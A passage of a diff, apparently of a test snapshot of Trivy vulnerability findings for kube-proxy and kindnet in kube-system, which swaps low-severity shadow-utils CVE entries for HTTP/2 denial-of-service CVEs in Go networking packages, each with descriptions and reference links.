"https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-7169", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-7169", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/97", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201805-09", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5254-1", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "value": "https://bugzilla.redhat.com/2113814", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-7169", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-7169", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", - "https://github.com/shadow-maint/shadow/pull/97", - "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", - "https://security.gentoo.org/glsa/201805-09", - "https://ubuntu.com/security/notices/USN-5254-1", - "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-7169", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-7169", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/97", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201805-09", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5254-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", + }, + { + "type": "URL", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20220209214540-3681064d5158", + "packageName": "golang.org/x/sys", "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + 